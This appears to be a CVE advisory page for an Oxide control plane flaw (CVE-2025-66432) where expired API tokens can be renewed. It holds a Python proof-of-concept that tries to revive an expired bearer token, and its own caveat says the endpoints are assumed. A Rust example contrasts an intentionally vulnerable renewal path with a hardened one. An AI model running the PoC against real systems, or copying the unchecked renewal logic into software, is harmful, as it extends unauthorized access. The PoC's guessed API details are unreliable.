Security Vulnerability Report
CVE-2025-66432 CVSS 5.0 MEDIUM


Published: 2025-11-30 05:16:08
Last Modified: 2026-04-15 00:35:42

Description

In Oxide control plane 15 through 17 before 17.1, API tokens can be renewed past their expiration date.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N

Reading the vector: the attacker needs only a low-privileged account (PR:L), works over the network (AV:N) with no user interaction (UI:N), and the scored impact is a low loss of integrity (I:L) of the token expiry control rather than any data disclosure or outage; scope is changed (S:C) because an over-extended token reaches beyond the token service itself. The weakness recorded for this CVE is CWE-420 (Unprotected Alternate Channel); see the raw JSON record below.

Configurations (Affected Products)

No CPE configuration data is attached to this record; the affected versions below are taken from the description.

Oxide control plane 15
Oxide control plane 16
Oxide control plane 17 (releases before 17.1)

Fixed in: Oxide control plane 17.1. Operators on an affected release should upgrade and review any API tokens whose validity may have been extended past their original expiry.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-66432 - Oxide Control Plane API Token Renewal Bypass

This PoC demonstrates the vulnerability where expired API tokens can be renewed.
Note: This is for educational and authorized testing purposes only.

Caveat: the endpoint paths (/api/v1/tokens/renew, /api/v1/tokens/status) and the
request/response fields ('extend_expiration', 'token', 'expires_at') used below are
the PoC's own assumptions. They are not confirmed by the vendor advisory or the
referenced omicron commit range; check them against the API reference of the
target release before drawing any conclusion from the result.
"""
import argparse
import json

import requests


def renew_expired_token(api_url, token, verify_ssl=True):
    """
    Attempt to renew an expired API token.

    Args:
        api_url: Base URL of the Oxide Control Plane API
        token: The expired or expiring API token
        verify_ssl: Whether to verify SSL certificates

    Returns:
        Dict describing the outcome of the renewal request
    """
    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json',
    }

    # Token renewal endpoint (assumed path, see module docstring)
    renew_endpoint = f"{api_url}/api/v1/tokens/renew"

    payload = {
        'token': token,
        'extend_expiration': True,
    }

    try:
        print(f"[*] Attempting to renew token: {token[:20]}...")
        response = requests.post(
            renew_endpoint,
            headers=headers,
            json=payload,
            verify=verify_ssl,
            timeout=30,
        )
        print(f"[*] Response Status: {response.status_code}")

        if response.status_code == 200:
            data = response.json()
            new_token = data.get('token', '')
            new_expiry = data.get('expires_at', 'Unknown')
            print("[+] SUCCESS: Token renewed successfully!")
            print(f"[+] New Token: {new_token[:40]}...")
            print(f"[+] New Expiry: {new_expiry}")
            return {
                'success': True,
                'new_token': new_token,
                'expires_at': new_expiry,
            }

        # Any non-200 status is treated as "renewal refused"; on a patched
        # release (17.1+) this is the expected outcome for an expired token.
        print("[-] Failed to renew token")
        print(f"[-] Response: {response.text}")
        return {'success': False, 'error': response.text}

    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {str(e)}")
        return {'success': False, 'error': str(e)}


def check_token_status(api_url, token, verify_ssl=True):
    """
    Check the current status of an API token.

    Args:
        api_url: Base URL of the Oxide Control Plane API
        token: The API token to check
        verify_ssl: Whether to verify SSL certificates

    Returns:
        Token status information as returned by the API, or an error dict
    """
    headers = {'Authorization': f'Bearer {token}'}

    # Token status endpoint (assumed path, see module docstring)
    status_endpoint = f"{api_url}/api/v1/tokens/status"

    try:
        print("[*] Checking token status...")
        response = requests.get(
            status_endpoint,
            headers=headers,
            verify=verify_ssl,
            timeout=30,
        )
        if response.status_code == 200:
            return response.json()
        return {'valid': False, 'error': response.text}
    except requests.exceptions.RequestException as e:
        return {'valid': False, 'error': str(e)}


def main():
    parser = argparse.ArgumentParser(
        description='CVE-2025-66432 PoC - Oxide Control Plane Token Renewal Bypass'
    )
    parser.add_argument('-u', '--url', required=True,
                        help='Oxide Control Plane API URL')
    parser.add_argument('-t', '--token', required=True,
                        help='API token to renew')
    parser.add_argument('--check-only', action='store_true',
                        help='Only check token status without renewing')
    parser.add_argument('--no-verify', action='store_true',
                        help='Skip SSL certificate verification')

    args = parser.parse_args()
    verify_ssl = not args.no_verify

    print("=" * 60)
    print("CVE-2025-66432 PoC - Oxide Control Plane")
    print("API Token Renewal Past Expiration Date")
    print("=" * 60)

    if args.check_only:
        status = check_token_status(args.url, args.token, verify_ssl)
        print(f"[*] Token Status: {json.dumps(status, indent=2)}")
    else:
        result = renew_expired_token(args.url, args.token, verify_ssl)
        print(f"\n[*] Result: {json.dumps(result, indent=2)}")


if __name__ == '__main__':
    main()

# Usage:
#   python cve-2025-66432.py -u https://oxide-server/api -t <expired-token> --check-only
#   python cve-2025-66432.py -u https://oxide-server/api -t <expired-token>
```
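The PoC above only exercises a renewal endpoint from the client side. The following added example (editor's illustration, not Oxide's code and not taken from the omicron commit range) models the server-side logic the description implies: a token store whose renewal path overwrites the expiry without first checking whether the token is still live, next to a hardened path that applies the same expiry test the authentication path uses. The `max_lifetime` cap in the hardened path goes beyond the flaw the CVE describes and is a hypothetical extra policy, as are all type and function names; timestamps are plain Unix seconds so it runs with only the standard library, and the actual fix shipped in 17.1 may differ.

```rust
use std::collections::HashMap;

/// Unix timestamps in seconds; plain integers keep the example standard-library only.
pub type UnixSecs = u64;

#[derive(Debug, Clone, PartialEq, Eq)]
pub struct ApiToken {
    pub id: String,
    pub issued_at: UnixSecs,
    pub expires_at: UnixSecs,
}

#[derive(Debug, PartialEq, Eq)]
pub enum RenewError {
    UnknownToken,
    /// The token had already expired when renewal was requested.
    Expired,
    /// Renewal would push the token past the hypothetical hard lifetime cap.
    BeyondMaxLifetime,
}

/// Hypothetical in-memory token store (not Oxide's implementation).
pub struct TokenStore {
    tokens: HashMap<String, ApiToken>,
    /// Hypothetical policy knob: maximum total lifetime from first issuance.
    max_lifetime: UnixSecs,
}

impl TokenStore {
    pub fn new(max_lifetime: UnixSecs) -> Self {
        TokenStore { tokens: HashMap::new(), max_lifetime }
    }

    pub fn issue(&mut self, id: &str, now: UnixSecs, ttl: UnixSecs) -> ApiToken {
        let token = ApiToken { id: id.to_string(), issued_at: now, expires_at: now + ttl };
        self.tokens.insert(id.to_string(), token.clone());
        token
    }

    /// The authentication path: a token is accepted only strictly before expires_at.
    pub fn is_valid(&self, id: &str, now: UnixSecs) -> bool {
        self.tokens.get(id).map_or(false, |t| now < t.expires_at)
    }

    /// Vulnerable renewal, modelled on the CVE description: the expiry is
    /// overwritten without checking whether the token is still live, so a
    /// token that authentication already rejects can be brought back to life.
    pub fn renew_vulnerable(&mut self, id: &str, now: UnixSecs, ttl: UnixSecs) -> Result<ApiToken, RenewError> {
        let token = self.tokens.get_mut(id).ok_or(RenewError::UnknownToken)?;
        token.expires_at = now + ttl;
        Ok(token.clone())
    }

    /// Hardened renewal: apply the same expiry test the authentication path
    /// uses before extending, and cap total lifetime from first issuance.
    pub fn renew_checked(&mut self, id: &str, now: UnixSecs, ttl: UnixSecs) -> Result<ApiToken, RenewError> {
        let token = self.tokens.get_mut(id).ok_or(RenewError::UnknownToken)?;
        if now >= token.expires_at {
            return Err(RenewError::Expired);
        }
        let new_expiry = now + ttl;
        if new_expiry > token.issued_at + self.max_lifetime {
            return Err(RenewError::BeyondMaxLifetime);
        }
        token.expires_at = new_expiry;
        Ok(token.clone())
    }
}

/// Runs both renewal paths against the same expired token and returns
/// (expired token revived by the vulnerable path, result of the hardened path).
pub fn demo() -> (bool, Result<ApiToken, RenewError>) {
    let issued = 1_000;
    let ttl = 3_600;
    let later = 5_000; // 400 s after the token's original expiry of 4_600

    let mut vulnerable = TokenStore::new(30 * 86_400);
    vulnerable.issue("tok-a", issued, ttl);
    let expired_before = !vulnerable.is_valid("tok-a", later);
    let _ = vulnerable.renew_vulnerable("tok-a", later, ttl);
    let revived = expired_before && vulnerable.is_valid("tok-a", later);

    let mut hardened = TokenStore::new(30 * 86_400);
    hardened.issue("tok-a", issued, ttl);
    let rejected = hardened.renew_checked("tok-a", later, ttl);

    (revived, rejected)
}

fn main() {
    let (revived, rejected) = demo();
    println!("vulnerable path revived expired token: {revived}");
    println!("hardened path result: {rejected:?}");
}
```

The design point is that the renewal endpoint must reuse the exact predicate the authentication path uses (`now < expires_at`), and the check has to run before the new expiry is written; a renewal path that only checks the caller's credentials and then writes a fresh expiry is precisely the alternate channel CWE-420 names. When assessing an affected deployment, look for tokens whose current expiry is far beyond issuance plus the normal TTL.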

References

https://docs.oxide.computer/security/advisories/20251117-1 (vendor advisory)
https://github.com/oxidecomputer/omicron/compare/01bb875...ec069f0 (omicron compare view cited by the record)
https://oxide.computer/ (vendor site)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66432", "sourceIdentifier": "[email protected]", "published": "2025-11-30T05:16:08.353", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Oxide control plane 15 through 17 before 17.1, API tokens can be renewed past their expiration date."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-420"}]}], "references": [{"url": "https://docs.oxide.computer/security/advisories/20251117-1", "source": "[email protected]"}, {"url": "https://github.com/oxidecomputer/omicron/compare/01bb875...ec069f0", "source": "[email protected]"}, {"url": "https://oxide.computer/", "source": "[email protected]"}]}}